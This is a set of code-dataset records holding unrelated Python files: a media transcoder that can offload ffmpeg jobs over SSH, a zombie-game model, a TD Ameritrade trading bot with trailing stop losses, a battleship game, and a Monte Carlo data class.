\" +\n time.asctime(time.localtime(time.time())))\n \n t0 = time.time()\n\n for base_path in watched_folders:\n base_path = normalize_path(base_path)\n logger.info('Searching for files in ' + base_path)\n t0 = time.time()\n for root, dirs, files in os.walk(base_path, topdown=True):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if needs_convert(os.path.join(root, file)):\n path = os.path.join(root, file)\n paths.append(normalize_path(path))\n t1 = time.time()\n logger.info('[Directory Scan] Execution took %s seconds' % str(round(t1-t0,0)))\n logger.info('=====Scan Complete=====')\n logger.info('Total files scanned: ' + str(len(paths)))\n\n if len(paths) > 0:\n logger.info('Converting...')\n \n if ssh_enabled == True and len(paths) > 0:\n ssh_client = paramiko.SSHClient()\n ssh_client.load_system_host_keys()\n try:\n ssh_client.connect(ssh_host, username=ssh_user, password=ssh_password, key_filename=ssh_key)\n except Exception as e:\n logger.error(\"SSH Error: \" + str(e))\n ssh_enabled = False\n if ssh_enabled:\n try:\n sftp_client = ssh_client.open_sftp()\n except Exception as e:\n logger.error(\"Error opening SFTP session: \" + str(e))\n ssh_enabled = False\n if ssh_enabled:\n try:\n sftp_client.chdir(ssh_folder)\n except IOError:\n logger.error(\"Invalid SFTP folder\")\n ssh_client.close()\n ssh_enabled = False\n if ssh_enabled:\n logger.info(\"SSH and SFTP sessions created successfully\")\n else:\n logger.warning(\"Disabling remote recoding due to SSH error\")\n \n count = 0.0\n for path in paths:\n count += 1.0\n cur_file = normalize_path(path)\n ffmpeg_cmd = ffmpeg_base_cmd + \"\\\"\" + cur_file + \"\\\"\"\n video_cmd = ' -c:v copy'\n audio_cmd = ' -c:a copy'\n need_remote = False\n redo_audio = False\n media_info = MediaInfo.parse(normalize_path(path))\n if MediaInfo.can_parse():\n for track in media_info.tracks:\n if track.track_type == 'Video':\n if not track.bit_rate:\n video_cmd = ffmpeg_video_encode\n need_remote = True\n elif not track.format.startswith(VIDEO_CODEC) or track.bit_rate > MAX_BITRATE or track.height > MAX_HEIGHT or track.width > MAX_WIDTH:\n video_cmd = ffmpeg_video_encode\n need_remote = True\n elif track.height % 2 or track.width %2:\n 
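# H.264 with yuv420p needs even frame dimensions; the pad filter in\n # ffmpeg_video_encode rounds odd sizes up (e.g. 1279x719 -> 1280x720),\n # so odd-sized sources get re-encoded.\n 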
video_cmd = ffmpeg_video_encode\n need_remote = True\n elif track.format.startswith(VIDEO_CODEC) and not track.format_profile.startswith(VIDEO_PROFILE):\n video_cmd = ffmpeg_video_encode\n need_remote = True\n elif track.track_type == 'Audio':\n if track.channel_s > MAX_CHANNELS or not track.format.startswith(AUDIO_CODEC):\n redo_audio = True\n audio_cmd = ffmpeg_audio_encode\n elif track.track_type == 'Text' and track.codec_id and track.codec_id.startswith('S_TEXT'):\n subname = str(track.track_id)\n if track.language:\n subname = track.language\n parts = cur_file.split('.')\n parts[len(parts)-1] = subname\n subcount = 1\n while os.path.isfile('.'.join(parts) + \".srt\"):\n parts[len(parts)-1] = subname + str(subcount)\n subcount = subcount + 1\n subfile = '.'.join(parts) + \".srt\"\n logger.info('Extracting subtitle: ' + subfile)\n sub_cmd = \"ffmpeg -loglevel error -hide_banner -i \\\"\" + cur_file + \"\\\" -map 0:\" + str(int(track.track_id)-1) + \" \\\"\" + subfile + \"\\\"\"\n p = subprocess.Popen(sub_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n for line in p.stdout.readlines():\n logger.error(line)\n retval = p.wait()\n if retval < -1 or retval > 10:\n logger.error('Error: ffmpeg process killed, exiting')\n sys.exit(1)\n if need_remote == True and ssh_enabled == True and JUST_CHECK == False:\n parts = cur_file.split('.')\n in_file = \"in.\" + parts[len(parts)-1]\n out_file = \"out.\" + EXT\n remote_infile = True\n try:\n sftp_client.lstat(in_file)\n except IOError:\n remote_infile = False\n if remote_infile:\n remote_delete(in_file)\n logger.info(\"Sending file: \" + cur_file)\n remote_infile = sftp_client.put(cur_file, in_file)\n if remote_infile:\n logger.info(\"File sent successfully\")\n video_cmd = ssh_ffmpeg_video_encode\n if redo_audio:\n audio_cmd = ssh_ffmpeg_audio_encode\n ffmpeg_cmd = ssh_folder + \"\\\\\" + ssh_ffmpeg_base_cmd + \"\\\"\" + ssh_folder + \"\\\\\" + in_file + \"\\\" \" + video_cmd + audio_cmd + ssh_ffmpeg_middle_cmd + \" \\\"\" + ssh_folder + \"\\\\\" + out_file + \"\\\"\"\n logger.debug(\"Full command: \" + ffmpeg_cmd)\n try:\n stdin, stdout, stderr = ssh_client.exec_command(ffmpeg_cmd)\n retval = stdout.channel.recv_exit_status()\n except Exception as e:\n logger.error(\"Error running remote command: \" + str(e))\n for line in stdout.readlines():\n logger.error(line)\n if retval == 0:\n logger.info('File processed successfully')\n if os.path.isfile(temp_file):\n delete(temp_file)\n try:\n sftp_client.get(out_file,temp_file)\n except IOError:\n logger.error(\"Error downloading processed file\")\n ssh_client.close()\n sys.exit(1)\n remote_delete(in_file)\n remote_delete(out_file)\n if DELETE:\n delete(cur_file)\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n else:\n if cur_file == to_mp4_naming(cur_file):\n cur_file = cur_file + \".new\"\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n stinfo = os.stat(cur_file)\n os.utime(cur_file, (stinfo.st_atime, stinfo.st_mtime+157680000))\n if retval < -1 or retval > 10:\n logger.error('Error: ffmpeg process failed remotely, exiting')\n ssh_client.close()\n sys.exit(1)\n else:\n ffmpeg_cmd = ffmpeg_cmd + video_cmd + audio_cmd + ffmpeg_middle_cmd + \" \\\"\" + temp_file + \"\\\"\"\n\n if JUST_CHECK:\n commands.append(ffmpeg_cmd)\n else:\n if os.path.isfile(temp_file):\n delete(temp_file)\n logger.warning('Encoding ' + cur_file)\n logger.debug(ffmpeg_cmd)\n p = subprocess.Popen(\n ffmpeg_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n for 
line in p.stdout.readlines():\n logger.error(line)\n retval = p.wait()\n logger.debug('Convert returned: ' + str(retval))\n if retval == 0:\n logger.info('File processed successfully')\n if DELETE:\n delete(cur_file)\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n else:\n if cur_file == to_mp4_naming(cur_file):\n cur_file = cur_file + \".new\"\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n stinfo = os.stat(cur_file)\n os.utime(cur_file, (stinfo.st_atime, stinfo.st_mtime+157680000))\n if retval < -1 or retval > 10:\n logger.error('Error: ffmpeg process killed, exiting')\n sys.exit(1)\n\n t1 = time.time()\n logger.info('[Media Check] Execution took %s s' % str(round(t1-t0,1)))\n\n if JUST_CHECK:\n for cmd in commands:\n logger.info(cmd)\n sys.exit(0)\n","sub_path":"media_convert_3.py","file_name":"media_convert_3.py","file_ext":"py","file_size_in_byte":17145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"410015342","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 6 00:26:55 2021\n\n@author: hgcol\n\"\"\"\n\nimport glfw\nimport numpy as np\nimport grafica.transformations as tr\nfrom random import random\nfrom random import randint\n\nclass Hinata():\n # Clase que contiene al modelo de Hinata\n def __init__(self, size, P):\n self.pos = [0,-0.7] # Posicion en el escenario\n self.model = None # Referencia al grafo de escena asociado\n self.controller = None # Referencia del controlador, para acceder a sus variables\n self.size = size # Escala a aplicar al nodo \n self.radio = 0.1 # distancia para realizar los calculos de colision\n self.status = \"Healthy\"\n self.life = 1\n self.P = P\n\n def set_model(self, new_model):\n # Se obtiene una referencia a uno nodo\n self.model = new_model\n\n def set_controller(self, new_controller):\n # Se obtiene la referncia al controller\n self.controller = new_controller\n\n def update(self,delta):\n # Se actualiza la posicion del auto\n\n # Si detecta la tecla [right] presionada se mueve hacia la derecha\n if self.controller.is_right_pressed and self.pos[0] < 0.5:\n self.pos[0] += delta\n # Si detecta la tecla [left] presionada se mueve hacia la izquierda\n if self.controller.is_left_pressed and self.pos[0] > -0.5:\n self.pos[0] -= delta\n # Si detecta la tecla [up] presionada\n if self.controller.is_up_pressed and self.pos[1] <= 1:\n self.pos[1] += delta\n # Si detecta la tecla [down] presionada\n if self.controller.is_down_pressed and self.pos[1] >= -1:\n self.pos[1] -= delta\n #print(self.pos[0], self.pos[1])\n\n # Se le aplica la transformacion de traslado segun la posicion actual\n self.model.transform = tr.matmul([tr.translate(self.pos[0], self.pos[1], 0), tr.scale(self.size, self.size, 1)])\n if self.status == \"Infected\":\n self.life -= self.P*delta\n if self.life <= 0:\n self.status = \"Dead\"\n \n def collision(self, enemies):\n # Funcion para detectar las colisiones con las cargas\n\n # Se recorren las cargas \n for enemy in enemies:\n # si la distancia a la carga es menor que la suma de los radios ha ocurrido en la colision\n if (self.radio+enemy.radio)**2 > ((self.pos[0]- enemy.pos[0])**2 + (self.pos[1]-enemy.pos[1])**2):\n self.status = enemy.status\n return\n \nclass Background():\n def __init__(self):\n self.model = None\n self.pos = [0,0]\n\n def set_model(self,new_model):\n self.model = new_model\n \n def update(self,delta):\n self.pos[1] -= delta/2\n if self.pos[1] <= -2:\n self.pos[1] = 0\n self.model.transform = 
tr.translate(self.pos[0], self.pos[1], 0)\n \nclass Zombie():\n def __init__(self,size):\n self.size = size\n self.model = None\n self.pos = [random()-0.5,random()*0.4+0.6]\n self.radio = 0.1\n self.status = \"Dead\"\n \n def set_model(self,new_model):\n self.model = new_model\n \n def update(self,delta):\n self.pos[1] -= delta/2\n self.model.transform = tr.matmul([tr.translate(self.pos[0],self.pos[1],0),\n tr.scale(self.size,self.size,1)])\n \nclass Human():\n def __init__(self,size,P):\n self.size = size\n self.model = None\n self.pos = [random()-0.5,random()*0.4+0.6]\n self.radio = 0.1\n self.status = None\n self.life = 1\n self.P = P\n \n def set_model(self,new_model):\n self.model = new_model\n \n def update(self,delta):\n self.pos[1] -= delta/2\n self.model.transform = tr.matmul([tr.translate(self.pos[0],self.pos[1],0),\n tr.scale(self.size,self.size,1)])\n if self.status == \"Infected\":\n self.life -= self.P*delta\n if self.life <= 0:\n self.status = \"Dead\"\n \n def set_status(self):\n r = randint(0,1)\n if r == 0:\n self.status = \"Healthy\"\n else:\n self.status = \"Infected\"\n \nclass Store():\n def __init__(self):\n self.model = None\n self.pos = [-0.78, 0.7]\n self.radio = 0.3\n self.status = \"Won\"\n \n def set_model(self,new_model):\n self.model = new_model\n \n def update(self):\n self.model.transform = tr.matmul([tr.translate(self.pos[0], self.pos[1],0), \n tr.scale(0.5, 0.5, 1)])\n ","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"8584702","text":"from selenium.webdriver.common.keys import Keys\nfrom selenium import webdriver\nfrom tda.auth import easy_client\nfrom tda.client import Client\nfrom trade_strats import *\nfrom process_data import *\nfrom download_data import *\nfrom config import *\nimport pandas as pd\nimport traceback\nimport datetime\nimport pickle\nimport tda\nimport os\n\n\n# driver_path = '/home/carmelo/Documents/StockMarket/StockCode/TOS/chromedriver_linux64/chromedriver'\n# browser = webdriver.Chrome(driver_path)\ndef get_day_params():\n today = datetime.datetime.now()\n return [today.year, today.month, today.day, today.hour, today.minute]\n\n\ndef waitbar_(current, total):\n done = int(np.round(((100 * (current / total)) / 2) - 1))\n togo = int(np.round(((100 * ((total - current) / total)) / 2)))\n per = str(np.round(100 * current / total, 1))\n print(done * '-' + '>' + togo * '.' 
+ per + '%', end='\\r')\n\n\ndef do_sleep(min, max):\n time_now = time.time()\n sleep_for = np.random.randint(min, max, 1)[0]\n waited_time = time.time() - time_now\n print('\\n')\n while waited_time < sleep_for:\n time.sleep(1)\n waited_time = time.time() - time_now\n waitbar_(waited_time, sleep_for)\n\n\ndef update_positions(p):\n file = open('TOS/positions.pickle', 'wb')\n pickle.dump(p, file)\n file.close()\n return p\n\n\ndef set_positions(d):\n if os.path.exists('TOS/positions.pickle'):\n p = get_positions()\n else:\n p = {}\n file = open('TOS/positions.pickle', 'wb')\n ticker = list(d.keys())[0]\n p[ticker] = d[ticker]\n pickle.dump(p, file)\n file.close()\n\n\ndef get_positions():\n if os.path.exists('TOS/positions.pickle'):\n file = open('TOS/positions.pickle', 'rb')\n positions = pickle.load(file)\n file.close()\n else:\n positions = {}\n return positions\n\n\ndef gen_watchlist(model):\n stocks = load_stocks('/home/carmelo/Documents/StockMarket/StockData/stocks_100d.obj')\n return get_watchlist(stocks, model, save_close=True)\n\n\ndef get_fpt(c, trades=4):\n account = c.get_account(account_id)\n account = account.json()['securitiesAccount']\n total_funds = account['currentBalances']['liquidationValue']\n fpt = np.round(total_funds / 4.25).astype('int')\n return fpt\n\n\ndef get_account_deets(c, funds_per_trade):\n account = c.get_account(account_id)\n account = account.json()['securitiesAccount']\n round_trips = account['roundTrips']\n available_funds = account['currentBalances']['buyingPowerNonMarginableTrade']\n num_trades_available = int(available_funds // funds_per_trade)\n return account, round_trips, available_funds, num_trades_available\n\n\ndef get_high_last(c, tickers):\n quotes = c.get_quotes(tickers)\n quotes = quotes.json()\n last_price = [quotes[ticker][\"lastPrice\"] for ticker in tickers]\n high_price = [quotes[ticker][\"highPrice\"] for ticker in tickers]\n hl = {}\n for idx, ticker in enumerate(tickers):\n hl[ticker] = {'last_price': last_price[idx], 'high_price': high_price[idx]}\n return hl\n\n\ndef get_buy_list(c, model, funds_per_trade, buy_dict={}):\n wl = gen_watchlist(model)\n watchlist = {}\n if os.path.exists('TOS/positions.pickle'):\n p = get_positions()\n p = [k for k in p.keys()]\n for ticker in list(wl.keys()):\n if ticker not in p:\n watchlist[ticker] = wl[ticker]\n else:\n for ticker in list(wl.keys()):\n watchlist[ticker] = wl[ticker]\n\n tickers = list(watchlist.keys())\n close_price = [watchlist[ticker]['close_price'] for ticker in tickers]\n premarket = c.get_quotes(tickers)\n premarket = premarket.json()\n open_ = [premarket[ticker][\"openPrice\"] for ticker in tickers]\n gap = np.array(open_) / np.array(close_price) - 1\n for idx, g in enumerate(gap):\n if model == 'SO':\n condition = g >= 0 and g < 0.1\n elif model == 'DTS':\n condition = g < 0 and g > -0.1\n else:\n return print('Model not supported')\n if condition:\n buy_price = premarket[tickers[idx]][\"openPrice\"]\n slp = watchlist[tickers[idx]]['stop_loss_percent']\n tgp = watchlist[tickers[idx]]['profit_percent']\n sell_price = np.round(buy_price * tgp, 2)\n stop_loss_0 = np.round(buy_price * slp, 2)\n stop_loss_1 = np.round(buy_price * slp, 2)\n shares = int(funds_per_trade / buy_price)\n buy_dict[tickers[idx]] = {'ticker': tickers[idx], 'buy_price': buy_price, 'shares': shares,\n 'buy_status': 'POSSIBLE', 'sell_status': '', 'sell_price': sell_price,\n 'stop_loss_0': stop_loss_0,\n 'stop_loss_1': stop_loss_1, 'buy_order_id': 0, 'sell_order_id': 0,\n 'high_price': buy_price, 
'last_price': buy_price,\n 'stop_loss_percent': slp, 'take_gain_percent':tgp, 'days_held': 0,\n 'watchlist_day': watchlist[tickers[idx]]['date'],\n 'purchase_date': get_day_params()}\n return buy_dict\n\n\ndef sell(c, stock, p):\n b = p[stock]\n spec = tda.orders.equities.equity_sell_limit(stock, b['shares'], b['sell_price'])\n sell_order = c.place_order(account_id, spec)\n order_id = tda.utils.Utils(c, account_id).extract_order_id(sell_order)\n if order_id is not None:\n p[stock]['sell_order_id'] = order_id\n p[stock]['sell_status'] = 'WAITING_TO_SELL'\n return p\n\n\ndef stop_loss_sell(c, stock, p, stop_loss):\n b = p[stock]\n spec = tda.orders.equities.equity_sell_limit(stock, b['shares'], b['last_price'])\n sell_order = c.place_order(account_id, spec)\n order_id = tda.utils.Utils(c, account_id).extract_order_id(sell_order)\n if order_id is not None:\n p[stock]['sell_order_id'] = order_id\n p[stock]['sell_status'] = 'WAITING_TO_SELL_STOP_LOSS'\n return p\n\n\ndef buy(c, buy_dict, buy_today):\n data = c.get_quotes(buy_today)\n data = data.json()\n high = [data[ticker][\"highPrice\"] for ticker in buy_today]\n open_ = [data[ticker][\"openPrice\"] for ticker in buy_today]\n last = [data[ticker][\"lastPrice\"] for ticker in buy_today]\n pop_ticker = []\n for idx in range(len(high)):\n if last[idx] > open_[idx] or (high[idx] - open_[idx]) / open_[idx] > 0.1:\n pop_ticker.append(buy_today[idx])\n buy_today = [bt for bt in buy_today if bt not in pop_ticker]\n for stock in buy_today:\n day = get_day_params()\n if buy_dict[stock]['watchlist_day'][1] + 10 + buy_dict[stock]['watchlist_day'][2] < day[1] + 10 + day[2]:\n b = buy_dict[stock]\n spec = tda.orders.equities.equity_buy_limit(stock, b['shares'], b['buy_price'])\n buy_order = c.place_order(account_id, spec)\n order_id = tda.utils.Utils(c, account_id).extract_order_id(buy_order)\n if order_id is not None:\n buy_dict[stock]['buy_order_id'] = order_id\n order = c.get_order(order_id, account_id).json()\n buy_dict[stock]['buy_status'] = order['status']\n set_positions({stock: buy_dict[stock]})\n positions = get_positions()\n return positions\n\n\ndef update_fill_price(c, p):\n try:\n order = c.get_order(p['buy_order_id'], account_id).json()\n buy_price = order['orderActivityCollection'][0]['executionLegs'][0]['price']\n slp = p['stop_loss_percent']\n tgp = p['take_gain_percent']\n sell_price = np.round(buy_price * tgp, 2)\n stop_loss_0 = np.round(buy_price * slp, 2)\n stop_loss_1 = np.round(buy_price * slp, 2)\n p['sell_price'] = sell_price\n p['stop_loss_0'] = stop_loss_0\n p['stop_loss_1'] = stop_loss_1\n p['actual_buy_price'] = buy_price\n except Exception:\n print(traceback.format_exc())\n pass\n return p\n\n\ndef monitor(c, p):\n pop_ticker = []\n for stock in p.keys():\n p[stock]['days_held'] = get_day_params()[2] - p[stock]['purchase_date'][2]\n b_order = c.get_order(p[stock]['buy_order_id'], account_id).json()\n if p[stock]['buy_order_id'] != 0 and p[stock]['buy_status'] != 'FILLED':\n p[stock]['buy_status'] = b_order['status']\n if p[stock]['buy_order_id'] == 'CANCELED':\n pop_ticker.append(stock)\n if p[stock]['sell_order_id'] != 0:\n s_order = c.get_order(p[stock]['sell_order_id'], account_id).json()\n if s_order['status'] == 'FILLED':\n pop_ticker.append(stock)\n if len(pop_ticker) > 0:\n for closed in pop_ticker:\n p.pop(closed)\n p = update_positions(p)\n tickers = list(p.keys())\n hl = get_high_last(c, tickers)\n for stock in p.keys():\n high_price = hl[stock]['high_price']\n last_price = hl[stock]['last_price']\n 
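# stop_loss_0 stays anchored at the fill price (used on the purchase day),\n # while stop_loss_1 below trails the running high: e.g. a buy at 100 with\n # stop_loss_percent 0.95 starts the stop at 95; if the high reaches 110,\n # the trailing stop moves up to 104.5.\n 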
p[stock]['last_price'] = last_price\n if p[stock]['high_price'] < high_price:\n p[stock]['high_price'] = hl[stock]['high_price']\n p[stock]['stop_loss_1'] = np.round(high_price * p[stock]['stop_loss_percent'], 2)\n if p[stock]['days_held'] > 0:\n if (last_price - p[stock]['stop_loss_1'])/p[stock]['stop_loss_1'] < 0.01:\n c.cancel_order(account_id, p[stock]['sell_order_id'])\n p = stop_loss_sell(c, stock, p, 'stop_loss_1')\n else:\n if (last_price - p[stock]['stop_loss_0'])/p[stock]['stop_loss_0'] < 0.01:\n c.cancel_order(account_id, p[stock]['sell_order_id'])\n p = stop_loss_sell(c, stock, p, 'stop_loss_0')\n p = update_positions(p)\n return p\n\n\ndef status_bar(p):\n # os.system('clear')\n tickers = p.keys()\n statuss = []\n for ticker in tickers:\n stop_loss = p[ticker]['stop_loss_0'] if p[ticker]['days_held'] == 0 else p[ticker]['stop_loss_1']\n target = p[ticker]['sell_price']\n bracket = np.arange(stop_loss, target, (target - stop_loss) / 20)\n current = p[ticker]['last_price']\n place = len(np.nonzero(bracket < current)[0])\n status = [':'] * 21\n try:\n pc = np.round(100 * (current - p[ticker]['actual_buy_price']) / p[ticker]['actual_buy_price'], 1)\n except KeyError:\n pc = 0\n status[place] = str(pc) + '%'\n status = [ticker, str(target)] + status[::-1] + [str(stop_loss)]\n statuss.append(status)\n if len(statuss[0])>0:\n for idx in range(len(statuss[0])):\n line = ''\n for k in range(len(tickers)):\n line += statuss[k][idx].center(11)\n print(line)\n print(time.strftime(\"%Y-%m-%dT%H%M%S\", time.localtime()))\n\n\ndef main():\n c = easy_client(api_key=client_id,\n redirect_uri=redirect_uri,\n token_path='/home/carmelo/Documents/StockMarket/StockCode/TOS/token.pickle')\n fpt = get_fpt(c, trades=4)\n buy_dict_day = 0\n downloaded = True\n bought_today = []\n if os.path.exists('TOS/positions.pickle'): p = get_positions()\n while True:\n day = get_day_params()\n day_condition = all([day[3] * 24 + day[4] / 60 >= 6 * 24 + 40 / 60, day[3] < 13])\n download_condition = all([16 <= day[3] < 23, not downloaded])\n if all([day[3] * 24 + day[4] / 60 >= 6 * 24 + 30 / 60, buy_dict_day != day[2]]):\n downloaded = False\n buy_dict = get_buy_list(c, 'SO', fpt)\n #buy_dict = get_buy_list(c, 'SO', fpt, buy_dict)\n buy_dict_day = day[2]\n try:\n account, round_trips, available_funds, num_trades_available = get_account_deets(c, funds_per_trade=fpt)\n num_trades_available = 0\n if num_trades_available > 0 and len(buy_dict) > 0 and day_condition:\n if len(buy_dict) >= num_trades_available:\n buy_today = random.sample(list(buy_dict.keys()), num_trades_available)\n else:\n buy_today = list(buy_dict.keys())\n buy_today = [bt for bt in buy_today if bt not in bought_today]\n p = buy(c, buy_dict, buy_today)\n if os.path.exists('TOS/positions.pickle'):\n for stock in p.keys():\n if p[stock]['buy_status'] == 'FILLED' and p[stock]['sell_order_id'] == 0:\n bought_today.append(stock)\n p[stock] = update_fill_price(c, p[stock])\n sell(c, stock, p)\n if day_condition:\n p = monitor(c, p)\n status_bar(p)\n except Exception:\n print(traceback.format_exc())\n pass\n if day[3] > 13 or day[3] < 6:\n do_sleep(600, 601)\n else:\n do_sleep(44, 45)\n if download_condition:\n bought_today = []\n downloaded = True\n download_data()\n process_data()\n\n\nmain()\n\n\n# Wait 5-10 mins after open\n# Check if spy is gapping\n# immediately add stock to purchased list prevent duplicates\n\n\n\n# time.strftime(\"%Y-%m-%dT%H%M%S\", 
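# Hedged sketch of the 20-slot price "bracket" that status_bar() above
# renders per ticker: the [stop_loss, target) interval is split into 20
# steps and the marker lands at the count of bracket edges below the
# current price. Prices and the percent label are made up.
import numpy as np

stop_loss, target, current = 95.0, 110.0, 101.5
bracket = np.arange(stop_loss, target, (target - stop_loss) / 20)
place = len(np.nonzero(bracket < current)[0])
status = [':'] * 21
status[place] = '+2.1%'      # hypothetical percent-change marker
print(place, ' '.join(status))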
time.localtime())\n########################################################\n########################################################\n########################################################\n########################################################\n# history = c.get_price_history('AAPL',\n# period_type=Client.PriceHistory.PeriodType.YEAR,\n# period=Client.PriceHistory.Period.TWENTY_YEARS,\n# frequency_type=Client.PriceHistory.FrequencyType.DAILY,\n# frequency=Client.PriceHistory.Frequency.DAILY)\n\n# r = c.get_orders_by_query(from_entered_datetime=datetime.datetime(2021, 2, ))\n# assert r.status_code == httpx.codes.OK, r.raise_for_status()\n# print(r.json())\n","sub_path":"StockCode/tos_link.py","file_name":"tos_link.py","file_ext":"py","file_size_in_byte":13876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638168742","text":"\nfrom random import randint\n\nboard_in = []\n\nfor i in range(5):\n board_in.append(['O'] * 10)\n\nfor row in board_in:\n print(\" \".join(row))\n\n\n\ndef randow_row(board_in):\n return randint(0, len(board_in) - 1)\n\n\ndef randow_col(board_in):\n return randint(0, len(board_in[0]) - 1)\n\nship=[]\nnumber=0\nwhile(number<5):\n x=randow_row(board_in)\n y=randow_col(board_in)\n if([x,y] not in ship):\n ship.append([x,y])\n number=number+1\n\nprint(ship)\n\ncount=0\nfor i in range(3):\n count=count+1\n print(\"Turn\",count)\n\n guess_row = int(input(\"猜一下船在第几行:\"))\n guess_col = int(input(\"猜一下船在第几列:\"))\n\n if(board_in[guess_row][guess_col]==\"X\"):\n print(\"你已经猜过这个位置了!\")\n\n board_in[guess_row][guess_col] = \"X\"\n\n if ([guess_row, guess_col] in ship):\n print(\"恭喜你猜对了!\")\n break\n elif guess_row not in range(len(board_in)) or guess_col not in range(len(board_in[0])):\n print(\"超出范围了!\")\n\n else:\n print(\"你没有击中我的船!\")\n if (count == 3):\n print(\"Game OVer!\")\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"9.0/9.40_01_slowy.py","file_name":"9.40_01_slowy.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130803400","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport itertools\nimport warnings\nfrom . import setutil\n\n__all__ = []\n\n\ndef public(sym):\n __all__.append(sym.__name__)\n return sym\n\ndef compute_raw_moments(psums, M, empty_value=0):\n '''\n Returns the raw moments or empty_value when M=0.\n '''\n idx = M != 0\n val = np.empty_like(psums, dtype=np.float)\n val[idx, :] = psums[idx, :] / np.tile(M[idx].reshape((-1,1)),\n (1, psums.shape[1]))\n val[M == 0, :] = empty_value\n return val\n\ndef compute_central_moment(psums, M, moment, empty_value=0):\n '''\n Returns the centralized moments or empty_value when M=0.\n '''\n raw = compute_raw_moments(psums, M, empty_value=empty_value)\n if moment == 1:\n return raw[:, 0]\n n = moment\n val = (-1)**n * raw[:, 0]**n\n # From http://mathworld.wolfram.com/CentralMoment.html\n nfact = np.math.factorial(n)\n for k in range(1, moment+1):\n nchoosek = nfact / (np.math.factorial(k) * np.math.factorial(n-k))\n val += nchoosek * (-1)**(n-k) * raw[:, k-1] * raw[:, 0]**(n-k)\n if moment % 2 == 1:\n return val\n # The moment should be positive\n if np.min(val)<0.0:\n \"\"\"\n There might be kurtosis values that are actually\n zero but slightly negative, smaller in magnitude\n than the machine precision. 
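# Hedged sketch of the identity compute_central_moment above relies on:
# the n-th central moment expanded in raw moments,
#   mu_n = sum_{k=0..n} C(n,k) * (-1)**(n-k) * m_k * m_1**(n-k)  (m_0 = 1),
# checked here for n = 2 against numpy's population variance.
import numpy as np

x = np.random.rand(1000)
m1, m2 = x.mean(), (x**2).mean()   # raw moments, i.e. power sums / M
mu2 = m2 - m1**2                   # the n = 2 expansion
print(np.isclose(mu2, x.var()))    # True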
Fixing these manually.\n \"\"\"\n idx = np.abs(val) < np.finfo(float).eps\n val[idx] = np.abs(val[idx])\n if np.min(val)<0.0:\n raise ArithmeticError(\"Significantly negative even moment! Possible problem in computing sums up to {}.\".format(moment))\n return val\n\n\n@public\nclass MIMCData(object):\n\n \"\"\"\n MIMC Data is a class for describing necessary data\n for a MIMC data, such as the dimension of the problem,\n list of levels, times exerted, sample sizes, etc...\n\n In a MIMC Run object, the data is stored in a MIMCData object\n\n \"\"\"\n\n def __init__(self, dim, lvls=None, psums=None, t=None, M=None,\n moments=2):\n self.dim = dim\n self.lvls = lvls # MIMC lvls\n self.psums = psums # sums of lvls\n self.t = t # Time of lvls\n self.M = M # Number of samples in each lvl\n if self.lvls is None:\n self.lvls = []\n if self.psums is None:\n self.psums = np.empty((0, moments))\n if self.t is None:\n self.t = np.empty(0)\n if self.M is None:\n self.M = np.empty(0, dtype=np.int)\n assert(len(self.lvls) == self.psums.shape[0])\n assert(len(self.lvls) == self.M.shape[0])\n assert(len(self.lvls) == self.t.shape[0])\n\n def calcEg(self):\n \"\"\"\n Return the sum of the sample estimators for\n all the levels\n \"\"\"\n return np.sum(self.calcEl())\n\n def __len__(self):\n return len(self.lvls)\n\n def __getitem__(self, ind):\n return MIMCData(self.dim,\n lvls=np.array(self.lvls, dtype=object)[ind].reshape((-1,self.dim)).tolist(),\n psums=self.psums[ind, :].reshape((-1, self.psums.shape[1])),\n t=self.t[ind].reshape(-1), M=self.M[ind].reshape(-1))\n\n def Dim(self):\n return self.dim\n\n def computedMoments(self):\n return self.psums.shape[1]\n\n def calcVl(self):\n return self.calcCentralMoment(2, empty_value=np.inf)\n\n def calcEl(self, moment=1):\n '''\n Returns the sample estimators for moments\n for each level.\n '''\n if moment > self.psums.shape[1]:\n raise ValueError(\"The {}'th moment was not computed\".format(moment))\n assert(moment > 0)\n idx = self.M != 0\n val = np.zeros_like(self.M, dtype=np.float)\n val[idx] = self.psums[idx, moment-1] / self.M[idx]\n return val\n\n def calcCentralMoment(self, moment, empty_value=np.inf):\n return compute_central_moment(self.psums, self.M, moment,\n empty_value=empty_value)\n\n def calcTl(self):\n idx = self.M != 0\n val = np.zeros_like(self.M, dtype=np.float)\n val[idx] = self.t[idx] / self.M[idx]\n return val\n\n def calcTotalTime(self, ind=None):\n return np.sum(self.t)\n\n def addSamples(self, psums, M, t):\n assert psums.shape[0] == len(M) and len(M) == len(t) and np.min(M) >= 0, \\\n \"Inconsistent arguments \"\n\n self.psums += psums\n self.M += M\n self.t += t\n\n def zero_samples(self):\n self.M = np.zeros_like(self.M)\n self.t = np.zeros_like(self.t)\n self.psums = np.zeros_like(self.psums)\n\n def addLevels(self, new_lvls):\n assert(len(new_lvls) > 0)\n prev = len(self.lvls)\n self.lvls.extend(new_lvls)\n s = len(self.lvls)\n self.psums.resize((s, self.psums.shape[1]), refcheck=False)\n self.t.resize(s, refcheck=False)\n self.M.resize(s, refcheck=False)\n return prev\n\n\nclass MyDefaultDict(object):\n def __init__(self, **kwargs):\n self.__dict__ = dict([i for i in kwargs.items() if i[1] is not None])\n\n def getDict(self):\n return self.__dict__\n\n def __getattr__(self, name):\n raise AttributeError(\"Argument '{}' is required but not \\\nprovided!\".format(name))\n\n\n@public\nclass MIMCRun(object):\n\n \"\"\"\n Object for a Multi-Index Monte Carlo run.\n\n 